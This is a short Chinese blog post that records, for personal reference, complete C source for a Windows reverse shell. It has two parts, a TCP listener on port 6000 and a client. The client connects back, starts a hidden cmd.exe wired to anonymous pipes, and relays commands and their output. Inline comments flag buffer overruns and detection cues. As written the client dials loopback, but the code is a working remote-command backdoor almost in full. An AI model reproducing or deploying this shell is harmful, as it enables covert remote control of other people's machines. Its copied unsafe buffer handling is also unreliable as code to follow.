
双管道cmd反弹程序

2016-01-24 02:13 330 查看
仅此记录,以备查询

server:

#include <WINSOCK2.H>
#include <windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")

// Receiver half of one operator session: blocks in recv() on the accepted
// socket and writes whatever the peer sent to this process's stdout.
// lPvoid: the accepted SOCKET, passed through _beginthread's void* argument.
// Never returns normally; ends the thread with ExitThread() once recv() fails.
void ReceiveThread(LPVOID lPvoid)
{
    SOCKET socketNew = (SOCKET)lPvoid;
    while(1)
    {
        char receiveBuf[1024];// receive buffer, refilled on every iteration
        int len = recv(socketNew,receiveBuf,sizeof(receiveBuf),0);
        if(len <= 0)
        {
            // 0 = peer closed, SOCKET_ERROR = failure: either way the socket is
            // dropped here, so SendThread's next send() on the same value is
            // expected to fail and end that thread too.
            closesocket(socketNew);
            printf("socket error...\n");
            ExitThread(0);
        }
        // NOTE(review): recv() may fill all 1024 bytes, in which case this NUL
        // is written one element past the end of receiveBuf.
        receiveBuf[len] = 0;
        // Peer-supplied bytes go to the terminal unfiltered; the format string
        // itself is fixed, so this is not a format-string sink.
        printf("%s",receiveBuf);
    }
}

// Sender half of one operator session: reads lines from this process's stdin
// and forwards each one, without its line terminator, to the peer.
// lPvoid: the accepted SOCKET, passed through _beginthread's void* argument.
// Ends the thread with ExitThread() on the first send() failure.
void SendThread(LPVOID lPvoid)
{
    SOCKET socketNew = (SOCKET)lPvoid;

    char test[] = "dir d:\\";   // unused sample command; never referenced below
    char sendBuf[1024];

    while(1)
    {
        // gets() has no length bound (it was removed from the language in C11);
        // a line longer than 1023 bytes overruns sendBuf.
        gets(sendBuf);
        //printf("Send:%s\n",sendBuf);
        // strlen() excludes the NUL, so no terminator goes on the wire; the
        // client on this page appends its own "\r\n" before feeding cmd.exe.
        if(SOCKET_ERROR == send(socketNew,sendBuf,strlen(sendBuf),0))
        {
            printf("Send Error\n");
            // After the first socket is closed this thread has not exited yet,
            // so typed input has no effect.
            // Of course this is only a test; normally each connection would
            // map to its own cmd window.
            ExitThread(0);
        }
    }

}

// Per-connection bootstrap: starts the receive and send threads for one
// accepted socket and then returns immediately, ending this thread.
// Both children receive the same SOCKET value. The second _beginthread
// argument (stack size) is passed as NULL, i.e. the default stack, and the
// returned thread handles are discarded, so nothing ever joins them.
void SocketThread(LPVOID lPvoid)
{
    SOCKET socketNew = (SOCKET)lPvoid;
    _beginthread(ReceiveThread, NULL, (LPVOID)socketNew);
    _beginthread(SendThread, NULL, (LPVOID)socketNew);

}

// Listener / operator console: accepts TCP connections on port 6000 and
// starts a SocketThread for each one. Runs until the process is killed;
// the trailing `return 1` is unreachable because the accept loop never exits.
int main(int argc,char **argv)
{
    // Initialise Winsock (version 2.2)
    WORD myVersionRequest;
    WSADATA wsaData;
    myVersionRequest=MAKEWORD(2,2);
    int err;
    err=WSAStartup(myVersionRequest,&wsaData);
    if (!err){
        printf("已打开套接字\n");
    }else{
        printf("ERROR:嵌套字未打开!");
        return 1;
    }
    // Create the listening socket
    SOCKET serSocket=socket(AF_INET,SOCK_STREAM,0);// TCP/IPv4 stream socket; return value not checked

    // Address to bind to
    SOCKADDR_IN addr;
    addr.sin_family=AF_INET;
    addr.sin_addr.S_un.S_addr=htonl(INADDR_ANY);// IP address: every local interface, not only loopback
    addr.sin_port=htons(6000);// listening port

    // Return values of bind()/listen() are ignored; if port 6000 is already
    // taken, every accept() below fails instead.
    bind(serSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR));// binding done
    listen(serSocket,5);// the second argument is the maximum number of pending connections

    //////////////////////////////////////////////////////////////////////////
    // Start accepting connections
    //////////////////////////////////////////////////////////////////////////
    SOCKADDR_IN clientsocket;
    int len=sizeof(SOCKADDR);

    while(1)
    {
        // No INVALID_SOCKET check: a failed accept() still spawns a
        // SocketThread whose recv()/send() then fail and exit.
        // Any peer that connects is served -- there is no authentication --
        // and the peer address written into clientsocket is never logged.
        SOCKET socketNew = accept(serSocket,(SOCKADDR*)&clientsocket,&len);
        printf("new connection is coming....\n");
        _beginthread(SocketThread, NULL, (LPVOID)socketNew);
    }
    return 1;
}

client:
#include <WINSOCK2.H>
#include <Windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")

// Anonymous pipe ends shared by CreateTwoPipe(), ReadOutPutReadCmd() and
// main(). Names follow the child's view of each stream: hStdInRead becomes
// cmd.exe's stdin and hStdOutWrite its stdout/stderr, while this process
// writes hStdInWrite and reads hStdOutRead.
HANDLE hStdInRead, hStdInWrite;
HANDLE hStdOutRead, hStdOutWrite;

// Security attributes for the two pipes; CreateTwoPipe() fills both in with
// bInheritHandle = TRUE so the child can inherit the ends it is given.
SECURITY_ATTRIBUTES saIn, saOut;

// Connection back to the listener; set in main(), read by ReadOutPutReadCmd().
SOCKET clientSocket;

// Creates the stdin and stdout pipes and launches a hidden cmd.exe whose
// standard handles are the pipe ends.
// Returns FALSE only when a CreatePipe call fails; the CreateProcess result
// is stored in dwRet but never tested, so TRUE comes back even if cmd.exe
// did not start. Nothing in this file ever calls CloseHandle, so the
// parent's copies of the child-side ends and the ProcessInformation handles
// stay open for the life of the process.
BOOL CreateTwoPipe()
{
    DWORD dwRet;
    // stdin pipe: inheritable, default security descriptor, default buffer size
    saIn.nLength = sizeof(SECURITY_ATTRIBUTES);
    saIn.bInheritHandle = TRUE;
    saIn.lpSecurityDescriptor = NULL;
    dwRet = CreatePipe(&hStdInRead, &hStdInWrite, &saIn, 0);
    if(!dwRet)
    {
        printf("failed to create in pipe...\n");
        return FALSE;
    }

    // stdout pipe, same attributes
    saOut.nLength = sizeof(SECURITY_ATTRIBUTES);
    saOut.bInheritHandle = TRUE;
    saOut.lpSecurityDescriptor = NULL;
    dwRet = CreatePipe(&hStdOutRead, &hStdOutWrite, &saOut, 0);
    if(!dwRet)
    {
        printf("failed to create in pipe...\n");   // message copied from the stdin case; this is the out pipe
        return FALSE;
    }

    STARTUPINFO si;
    ZeroMemory(&si, sizeof(si));
    // Hidden window plus redirected std handles: the child shows no console,
    // and cmd.exe's stderr shares the stdout pipe.
    si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow=SW_HIDE;
    si.hStdInput = hStdInRead;
    si.hStdOutput = hStdOutWrite;
    si.hStdError = hStdOutWrite;
    char cmdline[]="cmd.exe";   // writable array because lpCommandLine is non-const
    PROCESS_INFORMATION ProcessInformation;
    // bInheritHandles = 1 passes every inheritable handle to the child, i.e.
    // both ends of each pipe, not only the three assigned in si above.
    // Detection note: a cmd.exe child created with SW_HIDE and pipe-backed
    // std handles by a parent that holds an outbound TCP connection is the
    // process-tree shape a defender looks for.
    dwRet = CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);

    return TRUE;

}

// Output-pump thread: polls cmd.exe's stdout pipe and relays whatever is
// available to the listener over clientSocket. Exits when ReadFile fails
// (e.g. the pipe broke because cmd.exe ended) or send() returns <= 0.
// lPvoid is unused; all state comes from the file-scope globals.
void ReadOutPutReadCmd(LPVOID lPvoid)
{
    DWORD dwByteRecv;   // NOTE(review): not initialised; only written when PeekNamedPipe succeeds
    char Buf[1024] = {0};
    int ret;

    // Busy loop: there is no wait or Sleep() between polls, so this thread
    // spins at full speed while the pipe is empty.
    while(1)
    {
        memset(Buf, 0, sizeof(Buf));
        // Non-destructive peek; dwByteRecv receives the number of bytes copied
        // into Buf (at most 1024). The return value is not checked.
        PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
        if(dwByteRecv)
        {
            // Consume exactly the bytes the peek saw, then forward them raw
            // (no framing, no NUL) over the socket.
            ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
            if(!ret)
                break;
            ret = send(clientSocket, Buf, dwByteRecv, 0);
            if(ret <= 0)
                break;
        }
    }

}

// Connect-back side: dials the listener on 127.0.0.1:6000, spawns cmd.exe
// behind two pipes, starts the output pump, then forwards every received
// chunk to cmd.exe's stdin as one line until the connection drops.
int main(int argc,char **argv)
{
    int err;
    WORD versionRequired;
    WSADATA wsaData;
    versionRequired=MAKEWORD(2,2);
    err=WSAStartup(versionRequired,&wsaData);// version of the protocol library
    if (!err) {
        printf("客户端嵌套字已经打开!\n");
    }else{
        printf("ERROR:客户端的嵌套字打开失败!\n");
        return 1;// stop
    }
    clientSocket=socket(AF_INET,SOCK_STREAM,0);   // return value not checked

    // Target is hard-coded to loopback, so as written this only reaches a
    // listener on the same host.
    SOCKADDR_IN clientsock_in;
    clientsock_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");
    clientsock_in.sin_family=AF_INET;
    clientsock_in.sin_port=htons(6000);

    //bind(clientSocket,(SOCKADDR*)&clientsock_in,strlen(SOCKADDR));// note the third argument
    //listen(clientSocket,5);
    int ret = connect(clientSocket,(SOCKADDR*)&clientsock_in,sizeof(SOCKADDR));// start connecting
    if(ret != 0)
    {
        printf("failed to connect to server...\n");
        return 0;   // exit status 0 despite the failure; WSACleanup() is skipped
    }

    if(!CreateTwoPipe())
    {
        printf("failed to create pipe...\n");
        return 0;
    }

    DWORD dwByteRecv;
    char Buf[1024] = {0};

    // The output pump runs concurrently; this thread only handles the inbound side.
    _beginthread(ReadOutPutReadCmd, 0, NULL);

    while(1)
    {
        // Earlier single-threaded version, kept commented out for reference:
        // it polled the stdout pipe and the socket from this one loop.
        //memset(Buf, 0, sizeof(Buf));
        //Sleep(1000); // wait for cmd to execute
        //PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
        //if(dwByteRecv)
        //{
        // ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
        // if(!ret)
        // break;
        // ret = send(clientSocket, Buf, dwByteRecv, 0);
        // if(ret <= 0)
        // break;
        //}
        //else
        //{
        // dwByteRecv = recv(clientSocket, Buf, 1024, 0);

        // if(dwByteRecv <= 0)
        // break;
        // Buf[dwByteRecv] = '\r';
        // Buf[dwByteRecv+1] = '\n';
        // Buf[dwByteRecv + 2] = 0;
        // printf("recv: %s", Buf);
        // ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
        // if(!ret)
        // break;

        //}

        // NOTE(review): dwByteRecv is a DWORD while recv() returns int, so a
        // SOCKET_ERROR (-1) result converts to a large unsigned value and does
        // not satisfy the `<= 0` test below; only a clean close (0) ends the loop.
        dwByteRecv = recv(clientSocket, Buf, 1024, 0);

        if(dwByteRecv <= 0)
            break;
        // Turn the chunk into one cmd.exe line: append CR LF plus a NUL for
        // the printf. NOTE(review): Buf has 1024 elements, so these three
        // stores run past its end whenever dwByteRecv >= 1022.
        Buf[dwByteRecv] = '\r';
        Buf[dwByteRecv+1] = '\n';
        Buf[dwByteRecv + 2] = 0;
        printf("recv: %s", Buf);
        // Push the line (without the NUL) into cmd.exe's stdin; dwByteRecv is
        // reused as the bytes-written out-parameter.
        ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
        if(!ret)
            break;
    }
    closesocket(clientSocket);
    WSACleanup();
    system("pause");   // keeps the console open on exit; the cmd.exe child is not explicitly terminated here
    return 0;
}